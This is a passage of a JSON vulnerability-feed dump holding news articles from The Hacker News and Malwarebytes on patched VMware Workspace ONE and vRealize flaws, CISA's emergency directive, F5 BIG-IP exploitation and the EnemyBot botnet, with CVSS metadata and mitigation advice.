_\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2022-08-03T04:49:00", "type": "thn", "title": "VMware Releases Patches for Several New Flaws Affecting Multiple Products", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31657", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31662", "CVE-2022-31663", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-03T08:25:40", "id": "THN:97305EC3B8A0058F1A01ECB0B12FBD3E", "href": "https://thehackernews.com/2022/08/vmware-releases-patches-for-several-new.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-05-19T06:22:57", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjdo6Qyq6Cl_mWJDYZnviXPjIVW9fan7pRXKUukqzb6iq367-LOSVGv_1CUI04hyzkbzuY1-Bv4tKpxA3yDFc8Lo3BByd9UeB1zp9_Ge2Nlm5rKaqo8--9ilJOe_g_LpqeR3wzE9w91bZVrW48gh5XKFDhi4GGN9cpqc_6kGH6bHgEBLLpDdhoC2YpE/s728-e100/vmware.jpg>)\n\nVMware has issued patches to contain [two security flaws](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>) impacting Workspace ONE Access, Identity Manager, and vRealize Automation that could be exploited to backdoor enterprise networks.\n\nThe first of the two flaws, tracked as CVE-2022-22972 (CVSS score: 9.8), concerns an authentication bypass that could enable an actor with network access to the UI to gain administrative access without prior authentication.\n\nCVE-2022-22973 (CVSS score: 7.8), the other bug, is a case of local privilege escalation that could enable an attacker with local access to elevate privileges to the \"root\" user on vulnerable virtual appliances.\n\n\"It is extremely important that you quickly take steps to patch or mitigate these issues in on-premises deployments,\" VMware [said](<https://core.vmware.com/vmsa-2022-0014-questions-answers-faq>).\n\nThe disclosure follows a [warning](<https://www.cisa.gov/uscert/ncas/current-activity/2022/05/18/cisa-issues-emergency-directive-and-releases-advisory-related>) from the U.S. Cybersecurity and Infrastructure Agency (CISA) that advanced persistent threat (APT) groups are exploiting CVE-2022-22954 and CVE-2022-22960 \u2014 two other VMware flaws that were [fixed](<https://thehackernews.com/2022/04/vmware-releases-critical-patches-for.html>) [early last month](<https://thehackernews.com/2022/04/vmware-releases-patches-for-critical.html>) \u2014 separately and in combination.\n\n\"An unauthenticated actor with network access to the web interface leveraged CVE-2022-22954 to execute an arbitrary shell command as a VMware user,\" it said. \"The actor then exploited CVE-2022-22960 to escalate the user's privileges to root. With root access, the actor could wipe logs, escalate permissions, and move laterally to other systems.\"\n\nOn top of that, the cybersecurity authority noted that threat actors have deployed post-exploitation tools such as the Dingo J-spy web shell in at least three different organizations.\n\nIT security company Barracuda Networks, in an [independent report](<https://blog.barracuda.com/2022/05/17/threat-spotlight-attempts-to-exploit-new-vmware-vulnerabilities/>), said it has observed consistent probing attempts in the wild for CVE-2022-22954 and CVE-2022-22960 soon after the shortcomings became public knowledge on April 6.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjaPrXn1XfHadatV2N4b_itqqrI2wEGgb0BlVgiL8DoxQNoPKFMnfIxeMPf_0BQY1aIj6xJ6Jzp3pdwxrAImifZhB6dWwKp3rkMKVhRr9ZN2DzQWx3gXATGFHXy-Y4ER1Kuj-ZLESMZcPE-O8zmbk7kkpS1n3OzP2U2I6LDrIX-56SfkimD7ARb8lWh/s728-e100/vmware.jpg>)\n\nMore than three-fourths of the attacker IPs, about 76%, are said to have originated from the U.S., followed by the U.K. (6%), Russia (6%), Australia (5%), India (2%), Denmark (1%), and France (1%).\n\nSome of the exploitation attempts recorded by the company involve botnet operators, with the threat actors leveraging the flaws to deploy variants of the [Mirai](<https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html>) distributed denial-of-service (DDoS) malware.\n\nThe issues have also prompted CISA to issue an [emergency directive](<https://www.cisa.gov/emergency-directive-22-03>) urging federal civilian executive branch (FCEB) agencies to apply the updates by 5 p.m. EDT on May 23 or disconnect the devices from their networks.\n\n\"CISA expects threat actors to quickly develop a capability to exploit these newly released vulnerabilities in the same impacted VMware products,\" the agency said.\n\nThe patches arrive a little over a month after the company rolled out an update to resolve a critical security flaw in its Cloud Director product ([CVE-2022-22966](<https://thehackernews.com/2022/04/critical-vmware-cloud-director-bug.html>)) that could be weaponized to launch remote code execution attacks.\n\n### CISA warns of active exploitation of F5 BIG-IP CVE-2022-1388\n\nIt's not just VMware that's under fire. The agency has also released a follow-up advisory with regards to the active exploitation of [CVE-2022-1388](<https://thehackernews.com/2022/05/cisa-urges-organizations-to-patch.html>) (CVSS score: 9.8), a recently disclosed remote code execution flaw affecting BIG-IP devices.\n\nCISA [said](<https://www.cisa.gov/uscert/ncas/alerts/aa22-138a>) it expects to \"see widespread exploitation of unpatched F5 BIG-IP devices (mostly with publicly exposed management ports or self IPs) in both government and private sector networks.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-19T05:48:00", "type": "thn", "title": "VMware Releases Patches for New Vulnerabilities Affecting Multiple Products", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388", "CVE-2022-22954", "CVE-2022-22960", "CVE-2022-22966", "CVE-2022-22972", "CVE-2022-22973"], "modified": "2022-05-19T05:48:33", "id": "THN:8E366D56AB2756B4DE53AEEA90675132", "href": "https://thehackernews.com/2022/05/vmware-releases-patches-for-new.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:30", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgH2zt4g1_P1xvK8Wi8KSMw9vIPPJtky5piaCiNK-rjkmE-7yuBZYiKkwAk7wlIoTWl-rZNqoM03K9UoNLWQBA6OjwSGjfbBoKY0KYD9kDaNKMXqbGugujnFHkWdeBlPriwsgVx5WtbGKg5Y3L-3k2nrqyj9liy7jKHR8dHDgirdUlIT1MLoi-UtdMZ/s728-e100/vmware.jpg>)\n\nVMware has released security updates to patch eight vulnerabilities spanning its products, some of which could be exploited to launch remote code execution attacks.\n\nTracked from [CVE-2022-22954 to CVE-2022-22961](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html>) (CVSS scores: 5.3 - 9.8), the issues impact VMware Workspace ONE Access, VMware Identity Manager, VMware vRealize Automation, VMware Cloud Foundation, and vRealize Suite Lifecycle Manager.\n\nFive of the eight bugs are rated Critical, two are rated Important, and one is rated Moderate in severity. Credited with reporting all the vulnerabilities is Steven Seeley of Qihoo 360 Vulnerability Research Institute.\n\nThe list of flaws is below -\n\n * **CVE-2022-22954** (CVSS score: 9.8) - Server-side template injection remote code execution vulnerability affecting VMware Workspace ONE Access and Identity Manager\n * **CVE-2022-22955 &amp; CVE-2022-22956** (CVSS scores: 9.8) - OAuth2 ACS authentication bypass vulnerabilities in VMware Workspace ONE Access\n * **CVE-2022-22957 &amp; CVE-2022-22958** (CVSS scores: 9.1) - JDBC injection remote code execution vulnerabilities in VMware Workspace ONE Access, Identity Manager, and vRealize Automation\n * **CVE-2022-22959** (CVSS score: 8.8) - Cross-site request forgery (CSRF) vulnerability in VMware Workspace ONE Access, Identity Manager, and vRealize Automation\n * **CVE-2022-22960** (CVSS score: 7.8) - Local privilege escalation vulnerability in VMware Workspace ONE Access, Identity Manager and vRealize Automation, and\n * **CVE-2022-22961** (CVSS score: 5.3) - Information disclosure vulnerability impacting VMware Workspace ONE Access, Identity Manager and vRealize Automation\n\nSuccessful exploitation of the aforementioned weaknesses could allow a malicious actor to escalate privileges to root user, gain access to the hostnames of the target systems, and remotely execute arbitrary code, effectively allowing full takeover.\n\n\"This critical vulnerability should be patched or mitigated immediately,\" VMware [said](<https://core.vmware.com/vmsa-2022-0011-questions-answers-faq>) in an alert. \"The ramifications of this vulnerability are serious.\"\n\nWhile the virtualization services provider noted that it has not seen any evidence that the vulnerabilities have been exploited in the wild, it's highly recommended to apply the patches to remove potential threats.\n\n\"Workarounds, while convenient, do not remove the vulnerabilities, and may introduce additional complexities that patching would not,\" the company cautioned.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-07T05:49:00", "type": "thn", "title": "VMware Releases Critical Patches for New Vulnerabilities Affecting Multiple Products", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22955", "CVE-2022-22956", "CVE-2022-22957", "CVE-2022-22958", "CVE-2022-22959", "CVE-2022-22960", "CVE-2022-22961"], "modified": "2022-04-07T05:49:08", "id": "THN:3FE4961C11E2DB2B8015ACFEF6CDFB9B", "href": "https://thehackernews.com/2022/04/vmware-releases-critical-patches-for.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-31T05:56:10", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiBs1v_UBB96XLwx1fhDB24ftZm1R62Ku1955ZGISzLISuse4t_qn4dHBN2z84qTMZzGt97CTTgScoGr9eBOu00Vwlfa9yOw-qRRAXiPJRy7VQLYUNELMAusESXMjCUTEAFj0EPHqLPRnwAtLbNPQLys8F4CDIVvGrmmJqXok_igJowzJPNKzVrBOoL/s728-e100/code.jpg>)\n\nA nascent Linux-based botnet named **Enemybot** has expanded its capabilities to include recently disclosed security vulnerabilities in its arsenal to target web servers, Android devices, and content management systems (CMS).\n\n\"The malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities,\" AT&amp;T Alien Labs [said](<https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers>) in a technical write-up published last week. \"Services such as VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and more are being targeted as well as IoT and Android devices.\"\n\nFirst disclosed by [Securonix](<https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/>) in March and later by [Fortinet](<https://thehackernews.com/2022/04/new-enemybot-ddos-botnet-borrows.html>), Enemybot has been linked to a threat actor tracked as Keksec (aka Kek Security, Necro, and FreakOut), with early attacks targeting routers from Seowon Intech, D-Link, and iRZ.\n\nEnemybot, which is capable of carrying out [DDoS attacks](<https://en.wikipedia.org/wiki/Denial-of-service_attack>), draws its origins from several other botnets like Mirai, Qbot, Zbot, Gafgyt, and LolFMe. An analysis of the latest variant reveals that it's made up of four different components -\n\n * A Python module to download dependencies and compile the malware for different OS architectures\n * The core botnet section\n * An obfuscation segment designed to encode and decode the malware's strings, and\n * A command-and-control functionality to receive attack commands and fetch additional payloads\n\n\"In case an Android device is connected through USB, or Android emulator running on the machine, EnemyBot will try to infect it by executing [a] shell command,\" the researchers said, pointing to a new \"adb_infect\" function. ADB refers to [Android Debug Bridge](<https://developer.android.com/studio/command-line/adb>), a command-line utility used to communicate with an Android device.\n\nAlso incorporated is a new scanner function that's engineered to search random IP addresses associated with public-facing assets for potential vulnerabilities, while also taking into account new bugs within days of them being publicly disclosed.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgpc96pQMDAAqWfH85fEsGBf1xrj8m3a3gH9va1i7k-HmTzikPIzZGImKevqb3wxvW1wxFjhDs9J_Ii1xzSUdJpYaornlzqm5NOU8GCTzKMJoo7Tqy4kafPPjw7fLOUT5fXucBVfCUjMjn5-J2dr2U9992Sbsa-mLLWhevc7-l6Uqf_7AeQGz1sDvTF/s728-e100/goip.jpg>)\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjoCVQLY8Ozew4EQYe8whasxaFqzk8QnTX4P9wTrhC5kmGUuAW_20VD-gaPJ2Y9A-2hcLTSgVGc9UP7K9407c24ypTfJHRJvPoem7rVVTe50pMIY4MB-3dCwJ3rqYVc6BjGkU7_AGfuC5xLyp9rDp0g1R06cvFDa-Mxzow3EU9txlmSQAXEwuoIZQKn/s728-e100/log4j.jpg>)\n\nBesides the [Log4Shell vulnerabilities](<https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html>) that came to light in December 2021, this includes recently patched flaws in Razer Sila routers (no CVE), VMware Workspace ONE Access ([CVE-2022-22954](<https://thehackernews.com/2022/04/vmware-releases-patches-for-critical.html>)), and F5 BIG-IP ([CVE-2022-1388](<https://thehackernews.com/2022/05/cisa-urges-organizations-to-patch.html>)) as well as weaknesses in WordPress plugins like Video Synchro PDF.\n\nOther weaponized security shortcomings are below -\n\n * [**CVE-2022-22947**](<https://thehackernews.com/2022/05/new-sysrv-botnet-variant-hijacking.html>) (CVSS score: 10.0) - A code injection vulnerability in Spring Cloud Gateway\n * [**CVE-2021-4039**](<https://nvd.nist.gov/vuln/detail/CVE-2021-4039>) (CVSS score: 9.8) - A command injection vulnerability in the web interface of the Zyxel NWA-1100-NH firmware\n * [**CVE-2022-25075**](<https://nvd.nist.gov/vuln/detail/CVE-2022-25075>) (CVSS score: 9.8) - A command injection vulnerability in TOTOLink A3000RU wireless router\n * [**CVE-2021-36356**](<https://nvd.nist.gov/vuln/detail/CVE-2021-36356>) (CVSS score: 9.8) - A remote code execution vulnerability in KRAMER VIAware\n * [**CVE-2021-35064**](<https://nvd.nist.gov/vuln/detail/CVE-2021-35064>) (CVSS score: 9.8) - A privilege escalation and command execution vulnerability in Kramer VIAWare\n * [**CVE-2020-7961**](<https://thehackernews.com/2021/01/freakout-ongoing-botnet-attack.html>) (CVSS score: 9.8) - A remote code execution vulnerability in Liferay Portal\n\nWhat's more, the botnet's source code has been shared on GitHub, making it widely available to other threat actors. \"I assume no responsibility for any damages caused by this program,\" the project's README file [reads](<https://github.com/freakanonymous/enemy>). \"This is posted under Apache license and is also considered art.\"\n\n\"Keksec's Enemybot appears to be just starting to spread, however due to the authors' rapid updates, this botnet has the potential to become a major threat for IoT devices and web servers,'' the researchers said.\n\n\"This indicates that the Keksec group is well resourced and that the group has developed the malware to take advantage of vulnerabilities before they are patched, thus increasing the speed and scale at which it can spread.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-30T10:30:00", "type": "thn", "title": "EnemyBot Linux Botnet Now Exploits Web Server, Android and CMS Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7961", "CVE-2021-35064", "CVE-2021-36356", "CVE-2021-4039", "CVE-2022-1388", "CVE-2022-22947", "CVE-2022-22954", "CVE-2022-25075"], "modified": "2022-05-31T04:11:39", "id": "THN:A4284A3BA2971D8DA287C1A8393ECAC8", "href": "https://thehackernews.com/2022/05/enemybot-linux-botnet-now-exploits-web.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2022-08-03T15:33:33", "description": "In a new critical security advisory, [VMSA-2022-0021](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>), VMWare describes multiple vulnerabilities in several of its products, one of which has a [CVSS](<https://blog.malwarebytes.com/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) score of 9.8. Exploiting these vulnerabilities would enable a threat actor with network access to bypass authentication and execute code remotely.\n\n## Vulnerabilities\n\nVMWare patched several other vulnerabilities. These bugs would enable attackers to gain remote code execution or to escalate privileges to &#x27;root&#x27; on unpatched servers.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). You will find the most important ones listed below.\n\n### CVE-2022-31656\n\n[CVE-2022-31656](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31656>) is an authentication bypass vulnerability in VMware Workspace ONE Access, Identity Manager, and vRealize Automation that affects local domain users and was assigned a CVSS score of 9.8 out of 10. A remote attacker with network access to a vulnerable user interface could use this flaw to bypass authentication and gain administrative access. (VMWare credits security researcher [Petrus Viet](<https://twitter.com/VietPetrus/status/1554485970514608128>) with discovering this vulnerability.)\n\n### CVE-2022-31659 and CVE-2022-31658\n\nThe same researcher found two Remote Code Execution (RCE) vulnerabilities with a CVSS score of 8 out of 10\u2014[CVE-2022-31658](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31658>) and [CVE-2022-31659](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31659>). CVE-2022-31658 is a JDBC injection RCE, and CVE-2022-31659 us a SQL injection RCE. Both can be chained with CVE-2022-31656, turning the authentication bypass achieved into something that allows an attacker to perform remote code execution. These vulnerabilities also affect VMware Workspace ONE Access, Identity Manager, and vRealize Automation products.\n\n### CVE-2022-31665\n\n[CVE-2022-31665](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31665>) is a JDBC injection RCE vulnerability that exists in VMware Workspace ONE Access, Identity Manager, and vRealize Automation. JDBC (Java Database Connectivity) is an application programming interface (API) for Java, which defines how a client may access a database. A malicious actor with administrator and network access can trigger a remote code execution.\n\n## Other privilege escalation vulnerabilities\n\nBesides the already mentioned vulnerability listed as CVE-2022-31656 VMWare fixed [CVE-2022-31660](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31660>), [CVE-2022-31661](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31661>), and [CVE-2022-31664](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31664>) which are all local privilege escalation vulnerabilities. These vulnerabilities would allow a threat actor with local access to escalate privileges to &#x27;root&#x27;.\n\n## Mitigation\n\nEven though there is no evidence that the critical CVE-2022-31656 authentication bypass vulnerability is actively being exploited in attacks, VMWare states that it is extremely important that you quickly take steps to patch or mitigate all the issues in on-premises deployments.\n\nTo fully protect yourself and your organization, please install one of the patch versions listed in the [VMware Security Advisory](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>), or use the workarounds listed in the VMSA. \n\nStay safe, everyone!\n\nThe post [Update now! VMWare patches critical vulnerabilities in several products](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/08/update-now-vmware-patches-critical-vulnerabilities-in-several-products/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2022-08-03T13:27:47", "type": "malwarebytes", "title": "Update now! VMWare patches critical vulnerabilities in several products", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-03T13:27:47", "id": "MALWAREBYTES:4AD7D9B99AE2ADD1CBB83E0522B03A21", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/08/update-now-vmware-patches-critical-vulnerabilities-in-several-products/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-11T20:55:05", "description": "In a new critical security advisory, [VMSA-2022-0021](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>), VMWare describes multiple vulnerabilities in several of its products, one of which has a [CVSS](<https://www.malwarebytes.com/blog/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) score of 9.8. Exploiting these vulnerabilities would enable a threat actor with network access to bypass authentication and execute code remotely.\n\n## Vulnerabilities\n\nVMWare patched several other vulnerabilities. These bugs would enable attackers to gain remote code execution or to escalate privileges to 'root' on unpatched servers.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). You will find the most important ones listed below.\n\n### CVE-2022-31656\n\n[CVE-2022-31656](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31656>) is an authentication bypass vulnerability in VMware Workspace ONE Access, Identity Manager, and vRealize Automation that affects local domain users and was assigned a CVSS score of 9.8 out of 10. A remote attacker with network access to a vulnerable user interface could use this flaw to bypass authentication and gain administrative access. (VMWare credits security researcher [Petrus Viet](<https://twitter.com/VietPetrus/status/1554485970514608128>) with discovering this vulnerability.)\n\n### CVE-2022-31659 and CVE-2022-31658\n\nThe same researcher found two Remote Code Execution (RCE) vulnerabilities with a CVSS score of 8 out of 10--[CVE-2022-31658](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31658>) and [CVE-2022-31659](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31659>). CVE-2022-31658 is a JDBC injection RCE, and CVE-2022-31659 us a SQL injection RCE. Both can be chained with CVE-2022-31656, turning the authentication bypass achieved into something that allows an attacker to perform remote code execution. These vulnerabilities also affect VMware Workspace ONE Access, Identity Manager, and vRealize Automation products.\n\n### CVE-2022-31665\n\n[CVE-2022-31665](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31665>) is a JDBC injection RCE vulnerability that exists in VMware Workspace ONE Access, Identity Manager, and vRealize Automation. JDBC (Java Database Connectivity) is an application programming interface (API) for Java, which defines how a client may access a database. A malicious actor with administrator and network access can trigger a remote code execution.\n\n## Other privilege escalation vulnerabilities\n\nBesides the already mentioned vulnerability listed as CVE-2022-31656 VMWare fixed [CVE-2022-31660](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31660>), [CVE-2022-31661](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31661>), and [CVE-2022-31664](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31664>) which are all local privilege escalation vulnerabilities. These vulnerabilities would allow a threat actor with local access to escalate privileges to 'root'.\n\n## Mitigation\n\nEven though there is no evidence that the critical CVE-2022-31656 authentication bypass vulnerability is actively being exploited in attacks, VMWare states that it is extremely important that you quickly take steps to patch or mitigate all the issues in on-premises deployments.\n\nTo fully protect yourself and your organization, please install one of the patch versions listed in the [VMware Security Advisory](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>), or use the workarounds listed in the VMSA.\n\nStay safe, everyone!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-03T13:00:00", "type": "malwarebytes", "title": "Update now! VMWare patches critical vulnerabilities in several products", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-03T13:00:00", "id": "MALWAREBYTES:9E428F767EFCD8CC64A0BC77175C8151", "href": "https://www.malwarebytes.com/blog/news/2022/08/update-now-vmware-patches-critical-vulnerabilities-in-several-products", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-05-19T15:00:35", "description": "The Cybersecurity &amp; Infrastructure Security Agency has issued an Emergency Directive [ED 22-03](<https://www.cisa.gov/emergency-directive-22-03>) and released a [Cybersecurity Advisory (CSA)](<http://www.cisa.gov/uscert/ncas/alerts/aa22-138b>) about ongoing, and expected exploitation of multiple vulnerabilities in several VMware products.\n\n## Chaining unpatched VMware vulnerabilities\n\nThe title of the advisory is \u201cThreat Actors Chaining Unpatched VMware Vulnerabilities for Full System Control\u201d. That&#x27;s a bit confusing since there are patches available for these vulnerabilities, but threat actors are actively attacking unpatched systems. \n\nThe advisory warns organizations that malicious threat actors, most likely advanced persistent threat (APT) actors, are exploiting CVE-2022-22954 and CVE-2022-22960 separately and in combination.\n\n[**CVE-2022-22954**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22954>): VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. A malicious actor with network access can trigger a server-side template injection that may result in remote code execution.\n\nServer-side template injection is when an attacker is able to inject a malicious payload into a template, which is then executed server-side.\n\n[**CVE-2022-22960**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22960>): VMware Workspace ONE Access, Identity Manager, and vRealize Automation contain a privilege escalation vulnerability due to improper permissions in support scripts. A malicious actor with local access can escalate privileges to root.\n\nBoth these vulnerabilities were patched on April 6, 2022. But it took malicious threat actors less than 48 hours to reverse engineer the vendor updates to develop an exploit and start exploiting these disclosed vulnerabilities in unpatched devices.\n\nOn May 18, 2022, CISA said it expects malicious threat actors to quickly develop a capability to exploit CVE-2022-22972 and CVE-2022-22973 as well.\n\n[**CVE-2022-22972**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22972>): is an authentication bypass vulnerability in VMware Workspace ONE Access, Identity Manager and vRealize Automation that affects local domain users. In order to exploit this vulnerability, a remote attacker capable of accessing the respective user interface could bypass the authentication for these various products.\n\n[**CVE-2022-22973**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22973>): is a local privilege escalation vulnerability in the VMware Workspace ONE Access and Identity Manager. In order to exploit this vulnerability, an attacker would need to have local access to the vulnerable instances of Workspace ONE Access and Identity Manager. Successful exploitation would allow an attacker to gain \u201croot\u201d privileges.\n\n## Mitigation\n\nCISA strongly encourages all organizations to deploy the updates provided in VMware Security Advisory [VMSA-2022-0014](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>) or remove those instances from networks. CISA added CVE-2022-22954 and CVE-2022-22960 to its [catalog of known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), and federal, executive branch, departments, and agencies were all required to patch those vulnerabilities by May 5 and May 6 respectively. It stands to reason that the two new vulnerabilities will follow suit.\n\nCISA encourages organizations with affected VMware products that are accessible from the Internet to assume they have been compromised and to initiate threat hunting activities. To help with the threat hunting, CISA has provided detection methods and indicators of Compromise (IOCs) in the [CSA](<https://www.cisa.gov/uscert/ncas/alerts/aa22-138b>).\n\nIn the Response Matrix, as listed in the [VMWare advisory](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>), you can find the impacted products and versions.\n\nThe post [VMWare vulnerabilities are actively being exploited, CISA 